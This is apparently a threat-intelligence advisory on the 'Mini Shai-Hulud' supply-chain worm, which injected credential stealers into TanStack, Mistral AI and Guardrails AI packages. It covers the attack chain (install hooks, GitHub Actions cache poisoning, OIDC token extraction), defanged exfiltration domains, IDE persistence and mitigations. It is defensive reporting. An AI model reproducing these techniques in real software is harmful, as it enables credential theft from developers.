LIVE THREATS
MEDIUM OpenAI Daybreak Deploys Agentic AI Models for Vulnerability Detection and Patching // LOW State Machine Guardrails Proposed to Rein In Uncontrolled AI Agent Tool Access // CRITICAL Mini Shai-Hulud Supply Chain Worm Compromises Mistral AI, Guardrails AI and TanStack … // HIGH Adversaries Leverage LLMs to Accelerate Exploit Development and Attack Automation // CRITICAL AI-Developed Zero-Day Exploit Used in Mass Exploitation Attempt, Mandiant Warns // CRITICAL AI-Generated Zero-Day Exploit Bypasses 2FA in First Confirmed Wild Use // MEDIUM LLMs Demonstrate Strong Capability for Covert Text Steganography // CRITICAL Typosquatted OpenAI Repo on Hugging Face Delivered Rust Infostealer to 244K Users // HIGH Fake OpenAI Repository on Hugging Face Delivers Rust-Based Infostealer // HIGH ClaudeBleed Flaw Lets Rogue Chrome Extensions Hijack AI Agent //
ATLAS OWASP CRITICAL Active exploitation · Immediate action required RELEVANCE ▲ 9.2

Mini Shai-Hulud Supply Chain Worm Compromises Mistral AI, Guardrails AI and TanStack Packages

TL;DR CRITICAL
  • What happened: TeamPCP injected credential-stealing malware into AI and developer npm/PyPI packages via chained GitHub Actions exploits.
  • Who's at risk: Developers and organisations consuming TanStack, Mistral AI, Guardrails AI, UiPath, or OpenSearch packages are directly exposed to credential theft and CI/CD pipeline compromise.
  • Act now: Audit all installed versions of affected packages and update to clean releases immediately · Rotate all GitHub tokens, cloud provider credentials, and CI/CD secrets on affected machines · Review GitHub Actions workflows for unauthorised modifications and restrict pull_request_target trigger permissions
Mini Shai-Hulud Supply Chain Worm Compromises Mistral AI, Guardrails AI and TanStack Packages

Overview

A threat actor tracked as TeamPCP has launched a sweeping supply chain campaign, dubbed Mini Shai-Hulud, targeting npm and PyPI packages from TanStack, Mistral AI, Guardrails AI, UiPath, and OpenSearch. The campaign introduces an obfuscated credential stealer capable of harvesting secrets from cloud providers, cryptocurrency wallets, AI tooling, messaging applications, and CI/CD systems. The TanStack compromise has been assigned CVE-2026-45321 (CVSS 9.6), impacting 42 packages and 84 versions.

Technical Analysis

The attack uses two distinct infection vectors depending on the target package ecosystem:

TanStack cluster: A malicious JavaScript file (router_init.js) is embedded directly in the package tarball. An optional dependency pointing to a GitHub-hosted package is added; that dependency contains a prepare lifecycle hook which executes the payload via the Bun runtime. The initial staging exploits a chained GitHub Actions vulnerability — specifically the pull_request_target trigger combined with Actions cache poisoning and runtime memory extraction of an OIDC token from the runner process.

Mistral AI cluster: Follows an earlier TeamPCP pattern — the package.json preinstall hook is replaced to invoke node setup.mjs, which downloads Bun and runs the same JavaScript stealer.

Exfiltration routes include:

  • Primary: Data sent to filev2.getsession[.]org, leveraging Session Protocol infrastructure to avoid enterprise blocklists.
  • Fallback: Encrypted data committed to attacker-controlled GitHub repositories using stolen tokens via the GitHub GraphQL API, attributed to [email protected].

Persistence mechanisms include hooks injected into Claude Code and VS Code IDE startup sequences, a gh-token-monitor service for continuous GitHub token re-exfiltration, and two rogue GitHub Actions workflows that serialise repository secrets to JSON and upload them to api.masscan[.]cloud.

Framework Mapping

  • AML.T0010 (ML Supply Chain Compromise): Core attack vector — malicious code injected into widely-used AI and developer packages.
  • AML.T0047 (ML-Enabled Product or Service): Mistral AI and Guardrails AI packages directly targeted, compromising AI toolchain integrity.
  • AML.T0018 (Backdoor ML Model): Persistence in Claude Code IDE creates a persistent foothold within AI development workflows.
  • LLM05 (Supply Chain Vulnerabilities): Package-level compromise of AI SDK dependencies represents a direct OWASP LLM supply chain risk.
  • LLM06 (Sensitive Information Disclosure): Credential and secret exfiltration from AI development environments.

Impact Assessment

The blast radius is significant. Any developer who installed affected TanStack, Mistral AI, or Guardrails AI package versions may have had cloud credentials, GitHub tokens, CI/CD secrets, and AI API keys exfiltrated. Organisations using these packages in automated pipelines face compounded risk — injected GitHub Actions workflows could propagate secrets theft across entire repository ecosystems. The use of Session Protocol infrastructure for exfiltration reduces detection likelihood in enterprise environments that permit the domain.

Mitigation & Recommendations

  1. Immediately audit installed versions of TanStack, Mistral AI, Guardrails AI, UiPath, and OpenSearch packages against the confirmed malicious version list.
  2. Rotate all secrets — GitHub tokens, cloud provider API keys, CI/CD environment variables, and AI platform credentials on any affected systems.
  3. Review GitHub Actions workflows across all repositories for unauthorised additions; restrict pull_request_target trigger usage and enforce least-privilege OIDC token scopes.
  4. Scan for persistence artefacts in Claude Code and VS Code extension directories and startup hooks.
  5. Block or monitor outbound traffic to filev2.getsession[.]org and api.masscan[.]cloud.
  6. Enable npm and PyPI provenance attestation where available to reduce future supply chain exposure.

References

◉ AI THREAT BRIEFING

Stay ahead of the threat.

Twice-weekly digest of critical AI security developments — every story mapped to MITRE ATLAS and OWASP LLM Top 10. Free.

No spam. Unsubscribe anytime.